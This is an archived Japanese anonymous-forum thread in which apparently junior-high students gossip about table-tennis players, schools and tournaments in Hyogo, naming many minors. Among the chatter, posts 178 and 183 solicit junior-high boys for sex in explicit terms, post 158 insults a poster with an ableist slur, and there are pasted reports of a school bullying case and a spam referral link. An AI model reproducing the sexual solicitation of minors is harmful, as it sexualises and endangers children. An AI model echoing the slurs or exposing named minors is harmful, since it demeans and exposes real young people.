108 :ちゃー:2006/11/25(土) 14:37:58 ID:+E/cAT0p
思い出した・鷹取だ。


109 :ちゃー:2006/11/26(日) 11:43:09 ID:SWVsoXgj
でも実際、中矢は全国の大会で一回戦負けしてる。
全国で優勝した森がやっぱり強いよ。
須磨北のダブルス 足立・田中ペア が森のダブルスと一回戦で当たってたよ
一回戦負けだった。

110 :名無しQ(・∀・)ノ゜サァン!!:2006/11/26(日) 17:30:05 ID:nkjr6Hl9
・・・

111 :ちゃー:2006/11/26(日) 21:57:08 ID:SWVsoXgj
どぅした?

112 :ちゃー:2006/11/29(水) 17:57:09 ID:gBRNywRe
お〜い。何か話して来いよ。めっさ暇じゃないか。ったく!

113 :名無しQ(・∀・)ノ゜サァン!!:2006/11/30(木) 13:13:15 ID:Yc4Rfm3u
>112
じゃ〜聞く。来月の県新人戦を占ってみてくれ!!
団体個人共、本命・対抗・穴・大穴と・・

114 :ちゃー:2006/11/30(木) 20:10:31 ID:q2L1AqOT
いや〜。分からないね。俺出ないもん。そもそも須磨北のメンバー出ないよ。
ていうか、来月あるの?来年の5月までは無いって聞いたけど・・・
もしかして一年生?

115 :名無しQ(・∀・)ノ゜サァン!!:2006/11/30(木) 20:41:23 ID:Yc4Rfm3u
>114
漏れは人違いをしていたようだ・・
情報詳しいのは「様尾」君で君は卓球の弱い「ちゃー」君なのだな!
大体須磨区民プレーヤーはよってねーもんな!
ちょっびっと強いのは友が丘の2人くらいのもんだしな・・

116 :ちゃー:2006/12/01(金) 19:11:14 ID:wC0Ho3/A
言い返せない・・・確かに友が丘は強い。川田って知ってる?須磨北の。
そいつが中矢にフルセットまで行ったんだよ。
俺も友が丘の久保にフルセットであと一点足りなかった・・・

117 :名無しQ(・∀・)ノ゜サァン!!:2006/12/03(日) 18:14:53 ID:YKL9vsJf
>109
県の間違いじゃないのか?
>116
友が丘は確かに須磨区では強い。でも神戸市ではそこまで強くはない。
ちゃー君は久保にあと1点足りなかったって言ってるけど、それ間違ってるよ?
5セット目11-8で久保が取ったはず。だから1点ではない・・・。

118 :ちゃー:2006/12/03(日) 18:17:38 ID:sBrKGDRd
おぉ!よく知ってるねぇ。俺は忘れていたよ。でも俺の事をよく知ってるね。
どうして俺の事を?

119 :名無しQ(・∀・)ノ゜サァン!!:2006/12/03(日) 18:36:13 ID:YKL9vsJf
>118
その、ちゃー君は久保とあたった試合だけ見てた。
あと、馬場と久保って今年のカデット久保がストレート勝ってなかったっけ?

120 :名無しQ(・∀・)ノ゜サァン!!:2006/12/03(日) 21:40:32 ID:ddcvbAAr
タブソ・・・。
とにかく勝ってたのは知ってる・・・

121 :ちゃー:2006/12/03(日) 21:43:42 ID:sBrKGDRd
でも今は俺正直馬場に勝てるよ?

122 :名無しQ(・∀・)ノ゜サァン!!:2006/12/03(日) 21:44:25 ID:ddcvbAAr
あいつとか余裕やから
あいつに負けるやつの顔がみてみたいw

123 :名無しQ(・∀・)ノ゜サァン!!:2006/12/03(日) 21:45:07 ID:YKL9vsJf
>121
次馬場は久保ん所の8シードだと思う。
その時ちゃーと当たるかどうか楽しみだ。
馬場に勝っても久保か・・・際どいねぇ

124 :名無しQ(・∀・)ノ゜サァン!!:2006/12/03(日) 21:46:03 ID:ddcvbAAr
まず馬場にかてるのか?

125 :名無しQ(・∀・)ノ゜サァン!!:2006/12/03(日) 22:10:58 ID:ddcvbAAr
久保は強いよ。
中矢と同レベもしくは超えてる。

126 :名無しQ(・∀・)ノ゜サァン!!:2006/12/04(月) 12:51:26 ID:0nSsAPHl
>>105〜125
これって兵庫のどの辺のことを言ってるの?
兵庫県民の漏れでも全く解らんのだが(´・ω・`)
103の奴らは良く名前を知っているけど、それ以降の
メンバー"ちゃー"や久保、馬場、中矢ってすごく強そうだけど、
103のメンバーや堀本とか櫻井、西浦より強いの??

127 :ちゃー:2006/12/04(月) 18:37:10 ID:x2ZTnHJ9
でも俺はしばらく試合が無いよ。

128 :名無しQ(・∀・)ノ゜サァン!!:2006/12/04(月) 20:46:20 ID:ix1wtevD
今回の県大会優勝西浦

129 :名無しQ(・∀・)ノ゜サァン!!:2006/12/04(月) 20:49:45 ID:NrDBuuKS
[モバゲータウン]おもしろいよ登録してみてね〜 http://mbga.jp/AFmbb.0PzQ16593a/
誰でもいいからよろしく

130 :名無しQ(・∀・)ノ゜サァン!!:2006/12/04(月) 21:28:30 ID:0nSsAPHl
>>128
年末の新人戦か?何を根拠に?
西浦は去年の県カデットで小学生に負けたよな!
実力的には堀本では?

131 :名無しQ(・∀・)ノ゜サァン!!:2006/12/05(火) 23:06:59 ID:xrBW6naS
西浦も強くなってる。バックがすごい・・・

132 :ちゃー:2006/12/06(水) 18:12:29 ID:osumdzr1
西浦って何中?

133 :名無しQ(・∀・)ノ゜サァン!!:2006/12/06(水) 20:53:01 ID:Hhtf7xlh
俺じゃぁわからんケド、中矢とかよりゎ絶対に強い。
浦とか出口ってみんな知ってる??

134 :名無しQ(・∀・)ノ゜サァン!!:2006/12/06(水) 21:14:43 ID:yCsUhDtD
>133
浦、出口はコンパスクラブの人達。
浦は今年の神戸市新人戦のチャンピオン。
出口は去年の県カデット13歳以下のチャンピオン。
コンパス他のメンバーは今年の県総体2位、市新人戦3位の石田。
神戸市カデット13才以下優勝、市新人戦5位の高橋。
彼は前述の西浦に去年の県カデットで土を付けた。
あと神戸市カデット13才以下2位の浜端。
神戸市新人戦ベスト8の中村とかいる。
県内団体ならおそらく最強のクラブチームだと思うな。
ちなみに浦と高橋はサウスポーな。
近年、兵庫県チャンピオンはずっとサウスポーばかり。
中島、藤本、森と、浦と高橋が後に続けれるか??
来年の新一年の最有力候補は川卓の庄、西浦と同じロードスカイの和田。
彼らもまたサウスポーだよ!

135 :ちゃー:2006/12/07(木) 17:44:09 ID:afWI7x6q
出口だけしか知らない。

136 :名無しQ(・∀・)ノ゜サァン!!:2006/12/07(木) 18:04:34 ID:G6GOGiph
>134
浜端がコンパスという情報はどこから?
アイツ自分がコンパスへいってることはあまり知られたくないようだったが・・・

137 :名無しQ(・∀・)ノ゜サァン!!:2006/12/07(木) 18:32:43 ID:v6qD3eaO
>136
川西オープンに高橋と団体組んでたのを見た。
もう一人、体のごつい奴と一緒にコンパスからエントリーしてた。
しかし高橋も浜端も小浜じゃなかったっけ??
ひょっとすると助っ人なのかもな
ところでごつい奴のユニフォーム報徳っぽかったりするのだが誰だか知ってる?

138 :ちゃー:2006/12/08(金) 18:21:44 ID:e+CYSuIg
田中って知ってるだろ?須磨北の。皆にとっては、強いと思う?
本当にめちゃくちゃ強いよ


139 :名無しQ(・∀・)ノ゜サァン!!:2006/12/08(金) 21:31:16 ID:lTjKeN3R
>138
ちゃー君、田中って誰だよ??何年生?
めちゃくちゃ強い割には市大会の上位には入ってないみたいだけど・・・
それと出口しか知らないってことはちゃー君は市の大会には出たこと無いの??
浦とか長崎とかも神戸じゃ有名だよ!


140 :名無しQ(・∀・)ノ゜サァン!!:2006/12/09(土) 09:21:55 ID:eMFnJzDK
兵庫県立神戸高校で、また新たないじめが明らかになった。
男子生徒(17)に対し、男子軟式テニス部の部員らが集団で殴る、けるなど
の暴行のほか、縄跳びの縄で縛るなど執拗(しつよう)に いじめ を繰り返していた。
政財界などにも著名人を輩出する県内トップクラスの進学校で起きた事件に、
関係者 はショックを隠しきれなかった。
《進学校、関係者ショック》学校側の説明によると、男子生徒に対するいじめは
昨年8月、当時の3年生が引退し、部活動に参加しなくなってから始まった。
当時、同部には男子生徒を含め9人の部員がいたが、男子生徒を除く8人は
「練習態度が気に入らない」などといいがかりをつけては殴る、けるなどの暴行を加えた。
ときにはテニスラケットで殴ったり、縄跳びの縄で縛ったうえ、
携帯電話のカメラで撮影するなどしていたという。
集団いじめが発覚後、学校が自主的に調査をしたところ、
昨年8月から今年3月までの間、男子生徒に対 するいじめは33件あった。
内訳は、ホースで水をかけたり、ユニホームを破るなどのいやがらせ行為
が18件▽粘着テープで男子生 徒の体を巻いて殴るなど暴力行為が13件
▽「きもい」「うざい」などの中傷発言が2件−だった。


141 :ちゃー:2006/12/09(土) 20:36:23 ID:A8AW9uLQ
浦は知っているよ。田中は須磨北の1番手。知らない?嘘だね。
めちゃくちゃ有名だよ。

142 :名無しQ(・∀・)ノ゜サァン!!:2006/12/10(日) 21:00:16 ID:oocADhrc
>134
ゴメン、知ってる(笑
俺ゎ知ってるかぁ??って聞いてんケドなぁ。。。
浜端って小浜じゃぁないん?
でも出口が浦島に負けたのゎショックで寝込んだ(ぇ
なんかいっぱい書いてゴメソ^^;
田中ゎ弱いだろ・・
俺も人のことゎいえんケド((笑


143 :ちゃー:2006/12/10(日) 21:07:12 ID:SFISojJq
でも内で番手戦してるけど、もちろん一番手だぜ。
昨日は一緒に遊びに行った

144 :名無しQ(・∀・)ノ゜サァン!!:2006/12/11(月) 09:55:26 ID:yAi48yj1
sage

145 :名無しQ(・∀・)ノ゜サァン!!:2006/12/11(月) 17:13:21 ID:ZcbC+BM1
>143
意味がゎからない。
詳細キボン

146 :ちゃー:2006/12/11(月) 21:28:13 ID:isy58Ezk
なんかもうすぐ強化練習ってのがあるけど、何時からいつ?

147 :名無しQ(・∀・)ノ゜サァン!!:2006/12/12(火) 12:32:07 ID:xFcgR2eE
>ちゃー
君は誰に対して聞いているのだい???

148 :ちゃー:2006/12/12(火) 15:44:21 ID:P0lAPkqq
誰でもいい。


149 :ちゃー:2007/01/02(火) 12:43:59 ID:NAcC4RF8
お〜い。何か話して来いや。てめ〜ら雑魚のくせに。俺に勝てるはずないやろ。
お前らなんかラフゲームやし。

150 :名無しQ(・∀・)ノ゜サァン!!:2007/01/03(水) 15:20:48 ID:z3MTyi/s
ゥザスがぉるから話題変更おk?
ってかおkww
俺的にゎ結構出口かっこいいと思うw
でも声が・・・。
声で思い出したけど、夢野の山本・・。
あいつゎめっちゃうるさいww
今度聞いてみて^^

151 :名無しQ(・∀・)ノ゜サァン!!:2007/01/04(木) 04:53:02 ID:rixLbSAb
最近大山寺の土居強すぎ。
噂では何かのオープン大会で伊丹の川上と二見の野村に勝ったらしいで。
今度の一年生大会で高橋や井上に勝つかもしれんぞ。
>>ちゃー
お前絶対土居には勝たれへん!

152 :ちゃー:2007/01/04(木) 18:17:18 ID:3oEeLwXR
土井?聞いたことないなぁ〜。でも強そうやな〜(_≧Д≦)ノ彡☆
一度でいいから戦ってみたいΨ(`∀´)Ψケケケ

153 :名無しQ(・∀・)ノ゜サァン!!:2007/01/05(金) 05:09:07 ID:3EmzTr3i
>>152
テラキモス

154 :ちゃー:2007/01/06(土) 21:06:43 ID:CGPPRbjB
今日は唐堵中学校で練習試合をしたぜーΨ(`∀´)Ψケケケ


155 :名無しQ(・∀・)ノ゜サァン!!:2007/01/07(日) 00:10:18 ID:ILbYogjB
井上に勝てるやつは、堀本と西浦ぐらい

156 :名無しQ(・∀・)ノ゜サァン!!:2007/01/07(日) 16:52:28 ID:vx2dKTp9
>155
井上って川西ギャラントムの?

157 :名無しQ(・∀・)ノ゜サァン!!:2007/01/07(日) 23:38:00 ID:TeKOwQp7
神戸高校で2006年に明るみになった男子ソフトテニス部集団いじめ事件は、
部員全員でひとりの生徒を虐待してPTSDを発症させるという極 めて陰湿な
犯罪であり、3人が傷害や暴行の疑いで書類送検とな り、主犯格の2人が保
護観察処分となった。通常世間一般では、 このような事件が起これば「形
の上は自主退学だが、実際は放校処分」という手法が採られるが、今回学校
側は「学校教育上 の停学は重い。退学で放り出すのではなく、教育すること
も大事だ」と被害者家族に説明し、いじめに加担したとされる8名にボランテ
ィア活動(二日間の校内清掃)に参加させるなどの指導を続けていることを
明らかにした。しかし、前年には些細な 暴力事件で保護観察処分を受けた留
年生を自主退学させているという事例もあることから、こうした異例の形で片
をつけよう としたのは、加害者の多くが校内でトップクラスの成績であった
ことから来ているとする噂もあり、学校側の対応に対して疑問を口にするもの
も少なくない。なお、この加害者生徒に対する停学処分は春休み中であり、
他の生徒に秘匿される形で行われた。

158 :ちゃー:2007/01/11(木) 19:15:23 ID:/aNt2iKQ
こいつ↑バカじゃ無いの?頭が狂ったのか?バカが。
お前は身体障害者なのか?多分正解だろうな

159 :名無しQ(・∀・)ノ゜サァン!!:2007/01/11(木) 21:19:36 ID:4QprpykD
俺土井とやったでぇ〜!!
かなり強い!!
中矢に3−1で勝ってたw
しかも全国いってるし。
あんまりしらんけど、西浦君よりゎ弱いと思う。
と語るすごく雑魚の俺ww

160 :名無しQ(・∀・)ノ゜サァン!!:2007/01/12(金) 18:52:25 ID:SvVMko0J
てか卓球部とか終わってる
きもぃの多すぎ
陰キャラ集団じゃん

161 :名無しQ(・∀・)ノ゜サァン!!:2007/01/13(土) 08:24:18 ID:w0QnubMt
ヘ(-′д`-)ゝヤレヤレ..
こういう馬鹿がすぐしゃしゃりでてくる・・・。
だったらこなかったらいいじゃないですか。
それともお友達がいないのですか??w
そりゃかわいそうですね。どうぞどうぞ、
あなたが馬鹿にしてるこの板でカキコんでください。
みなさんいいですよね?
馬鹿が馬鹿といっている板に馬鹿なことを書く。
これは傑作ですねww
僕ゎ卓球が陰だとゎ思いません。
それゎ世間の偏見であってホントでゎありません。
みなさんも同じ卓球仲間なら実力関係なしにそう思います。
僕確かによくいわれますね。
でもその逆境の中で立ち向かっていくなんてかっこいいじゃないですか。
いいたいのはそれだけです。
やっぱり馬鹿にされている以上見過ごすわけにゎいきませんでした。
みなさんすみません。。。あぁ、また語っちゃったww

162 :名無しQ(・∀・)ノ゜サァン!!:2007/01/13(土) 14:24:07 ID:XMVnefB1
>>160
友達いないから相手して欲しいんだよナ。

163 :名無しQ(・∀・)ノ゜サァン!!:2007/01/13(土) 17:07:35 ID:Y4eMHEHH
誰か話そぉ!! 

164 :名無しQ(・∀・)ノ゜サァン!!:2007/01/13(土) 20:54:58 ID:w0QnubMt
>162
そうそうw
>163
おk、なに話す??卓球ねww

165 :ちゃー:2007/01/14(日) 20:32:50 ID:jQKNdDw1
友達居ないなんて可愛そうだね〜。でも友達がいなくて、寂しいのを
アピールして馬鹿とか言うのは本当のバカだね。
そいつが何部か知らないけど、そいつのほうが影キャラなんじゃないの?

166 :ちゃー:2007/01/14(日) 21:24:44 ID:jQKNdDw1
今度、どこかでえ〜と一年生大会ってあるやん?そのあとは2年生の団体戦とかするん?

167 :名無しQ(・∀・)ノ゜サァン!!:2007/01/14(日) 22:11:07 ID:bXvPDHvo
二見中の元卓球部谷本ってなにもの?

168 :ちゃー:2007/01/15(月) 20:41:07 ID:FBPpz2Y+
誰?おいらは知らない・・・

169 :名無しQ(・∀・)ノ゜サァン!!:2007/01/15(月) 23:35:22 ID:9sufENE3
宮本?おまえか?

170 :名無しQ(・∀・)ノ゜サァン!!:2007/01/16(火) 07:16:58 ID:M2s7eR8/
>166
そうやで。今のところの予定ゎそう。


171 :名無しQ(・∀・)ノ゜サァン!!:2007/01/16(火) 19:23:01 ID:KI4yiVpa
もしかしてこの中に友が丘いる?

172 :ちゃー:2007/01/16(火) 23:04:53 ID:j7IADr1j
皆はどこの中学なん?21日の団体戦でるん?

173 :名無しQ(・∀・)ノ゜サァン!!:2007/01/17(水) 00:02:56 ID:B+UgJ/Rp
チャーさんは何中?

174 :名無しQ(・∀・)ノ゜サァン!!:2007/01/17(水) 17:01:29 ID:2e813jf/
>171
おったらどうなん?
もしかしてあなた友が丘とか!?w

175 :163の女:2007/01/17(水) 19:03:24 ID:XAllkgmf
うちロードスカイのA年だよぉ♪164♪新人戦出てたよぉ♪


176 :名無しQ(・∀・)ノ゜サァン!!:2007/01/17(水) 21:39:23 ID:2e813jf/
>175
ロードスカイ??

177 :ちゃー:2007/01/17(水) 23:02:05 ID:AvTpXUAW
ちゃー(宮本)は須磨北。番手は5番手。微妙・・・
あと、ロードスカイって何?

178 :名無しQ(・∀・)ノ゜サァン!!:2007/01/18(木) 23:08:20 ID:a37iVs2g
某女子高校の卓球部です。卓球とエッチ大好きな女子です。童貞中学生探してます。

179 :名無しQ(・∀・)ノ゜サァン!!:2007/01/19(金) 18:33:35 ID:jUdV3Wjw
>178
じゃ場違い。
とっとと消えて。

180 :ちゃー:2007/01/19(金) 18:43:43 ID:9sVMpRMD
ここには女子なんて居ないよね・・・

181 :名無しQ(・∀・)ノ゜サァン!!:2007/01/19(金) 19:49:11 ID:fZbXMxLf
ロードスカイって・・・結構つよいところやろ

182 :ちゃー:2007/01/19(金) 22:03:18 ID:9sVMpRMD
明後日は団体戦だー。頑張るぜ。

183 :名無しQ(・∀・)ノ゜サァン!!:2007/01/19(金) 23:39:59 ID:SWORHqwD
178です。うちは中学生の時に、初めてセックスを経験してん。セックスって、すっごい気持ちいいし、男の方も、暖かく、ぬるぬるして、絡みつくらしく、お互いが、もう死んでもええ、と思えるくらい、気持ちいいねんで。だから、誘ってんねんやけど。

184 :名無しQ(・∀・)ノ゜サァン!!:2007/01/20(土) 00:33:57 ID:lLZ05z9l
きもいぜおまえら

185 :名無しQ(・∀・)ノ゜サァン!!:2007/01/25(木) 18:09:08 ID:fFspTv4+
>183
お前としたいやつなんかおらへんってw
消えろw

186 :名無しQ(・∀・)ノ゜サァン!!:2007/01/28(日) 21:42:14 ID:L1jWAUwC
えぇ〜っと、但馬の女子は・・・(調)

187 :名無しQ(・∀・)ノ゜サァン!!:2007/02/01(木) 18:00:16 ID:EuV9a8d0
>>174あなたもしかして…誰か分かりました

188 :名無しQ(・∀・)ノ゜サァン!!:2007/02/02(金) 07:25:35 ID:WvIUlF8o
>187
誰だと思う??
メルアド知ってたら送ってきてね♪
まぁ学校名だけでもいいけど^^;

189 :名無しQ(・∀・)ノ゜サァン!!:2007/02/03(土) 08:08:21 ID:DvV+BZDz
>>188
〇〇丘

190 :名無しQ(・∀・)ノ゜サァン!!:2007/02/03(土) 12:55:09 ID:BTpE6Kh+
友が丘ってあんまりつよくない

191 :名無しQ(・∀・)ノ゜サァン!!:2007/02/03(土) 22:13:32 ID:DvV+BZDz
夢ヶ丘 新しい学校のはず

192 :名無しQ(・∀・)ノ゜サァン!!:2007/02/04(日) 10:16:01 ID:4G8Kkp3J
>189
友が丘の誰??

193 :名無しQ(・∀・)ノ゜サァン!!:2007/02/10(土) 00:51:09 ID:Ww8JFOA0
友が丘って卓球弱いよな?

194 :名無しQ(・∀・)ノ゜サァン!!:2007/02/10(土) 16:07:05 ID:RQLrPK6m
三?

195 :岡山人:2007/02/11(日) 00:50:15 ID:/rZXY3R2
豊富の田中は結局どこ行くことになったん?

196 :名無しQ(・∀・)ノ゜サァン!!:2007/02/11(日) 02:48:43 ID:GkLXpgdF
多奇煮

197 :175の女:2007/02/12(月) 19:02:07 ID:sU3fXiDP
うち夢が丘(但馬)の人やで♪新人戦2位で出てた!!県大会ゎ8位だった!!


198 :名無しQ(・∀・)ノ゜サァン!!:2007/02/13(火) 17:19:22 ID:bfcYQccH
>>196
びっくり。
>>197
それはおめでとさん。

199 :名無しQ(・∀・)ノ゜サァン!!:2007/02/13(火) 17:58:45 ID:UQkQs7FB
>>198
禿げ同意。

200 :名無しQ(・∀・)ノ゜サァン!!:2007/02/13(火) 18:01:36 ID:fdUnMgV0
まじで?田中くん滝二かー!           それはよかったね

201 :名無しQ(・∀・)ノ゜サァン!!:2007/02/13(火) 18:03:25 ID:UQkQs7FB
そこらへんゎわからんゎw
おれ須磨区で私立じゃないからw

202 :名無しQ(・∀・)ノ゜サァン!!:2007/02/13(火) 18:04:30 ID:UQkQs7FB
>>200
その話についていけないw
なんたってゥチャァ、須磨区の私立じゃない中g(ry

203 :名無しQ(・∀・)ノ゜サァン!!:2007/02/13(火) 18:07:16 ID:UQkQs7FB
何回もゴメン間違えて同じん2個もやってもたw

204 :名無しQ(・∀・)ノ゜サァン!!:2007/02/14(水) 18:10:43 ID:Q4aD0qi9
今度須磨区の春の区総体っていつやった?

205 :名無しQ(・∀・)ノ゜サァン!!:2007/02/14(水) 19:30:39 ID:NFPgx1U8
知らンο須磨区とか篠藤くらレ1∪か強くなレ1よな!?

206 :名無しQ(・∀・)ノ゜サァン!!:2007/02/14(水) 22:47:50 ID:RjSoYX0L
そかそか


207 :名無しQ(・∀・)ノ゜サァン!!:2007/02/23(金) 19:27:00 ID:nKfJJp7U
過疎過疎♪゚+。
ぁたし夢ヶ丘の仔と仲良いよぉ〜☆

208 :名無しQ(・∀・)ノ゜サァン!!:2007/02/25(日) 18:49:05 ID:ynXbyuXQ
私、兵庫県で卓球してます!中学生です★!話に入れてほしいな♪??

209 :名無しQ(・∀・)ノ゜サァン!!:2007/03/03(土) 13:02:48 ID:Pg4xJCcL
許可します

210 :名無しQ(・∀・)ノ゜サァン!!:2007/03/04(日) 13:06:23 ID:8et20/14
ありがとうございます!!
>>209さんは、どこの地区住みですか?

211 :名無しQ(・∀・)ノ゜サァン!!:2007/03/04(日) 17:58:28 ID:hH50KSMB
友が丘、そんなに弱くない。

212 :名無しQ(・∀・)ノ゜サァン!!:2007/03/04(日) 21:44:42 ID:ui62CSmy
友が丘厄介

213 :名無しQ(・∀・)ノ゜サァン!!:2007/03/04(日) 23:01:31 ID:2ZjmI068
友が丘ってどこらへん?最近の記録だと県大会でてないよな?

214 :名無しQ(・∀・)ノ゜サァン!!:2007/03/06(火) 19:41:50 ID:d4mjOB3t
>>210
但馬です And you?

215 :名無しQ(・∀・)ノ゜サァン!!:2007/03/06(火) 21:33:50 ID:n3snQp71
>>214
西播です!!


216 :名無しQ(・∀・)ノ゜サァン!!:2007/03/08(木) 08:31:20 ID:0He+0fOe
ゴリの弟滝二かい

217 :停止しました。。。:停止
真・スレッドストッパー。。。( ̄ー ̄)ニヤリッ

46 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)